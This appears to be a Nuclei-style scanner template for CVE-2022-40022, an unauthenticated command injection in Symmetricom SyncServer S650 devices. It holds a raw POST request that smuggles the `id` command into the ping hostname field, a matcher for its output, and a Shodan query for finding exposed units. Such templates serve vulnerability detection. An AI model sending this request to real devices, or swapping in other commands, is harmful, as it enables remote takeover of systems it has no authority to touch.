56 lines
1.9 KiB
YAML
56 lines
1.9 KiB
YAML
id: CVE-2022-40022
|
|
|
|
info:
|
|
name: Symmetricom SyncServer Unauthenticated - Remote Command Execution
|
|
author: DhiyaneshDK
|
|
severity: critical
|
|
description: |
|
|
Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.
|
|
reference:
|
|
- http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-40022
|
|
- https://www.microsemi.com/campaigns/network-time-servers/S650p/%3Fgd%3D1&id=5&gclid=Cj0KCQjwjbyYBhCdARIsAArC6LL-202ej5YfDB5lMIMSZ2735qjo5yaj2i-PrvLv2Cnh_kIJtFJ0oF8aAlMpEALw_wcB
|
|
- https://www.microsemi.com/campaigns/network-time-servers/syncserver-s600/?url=
|
|
- https://www.microsemi.com/document-portal/doc_download/135737-datasheet-syncserver-s650
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-40022
|
|
cwe-id: CWE-77
|
|
epss-score: 0.75757
|
|
cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: html:"Symmetricom SyncServer"
|
|
verified: "true"
|
|
vendor: microchip
|
|
product: syncserver_s650_firmware
|
|
tags: packetstorm,cve,cve2022,syncserver,rce,unauth
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /controller/ping.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: {{RootURL}}/controller/ping.php
|
|
|
|
currentTab=ping&refreshMode=ðDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "uid=([0-9(a-z)]+)"
|
|
|
|
- type: status
|
|
status:
|
|
- 302
|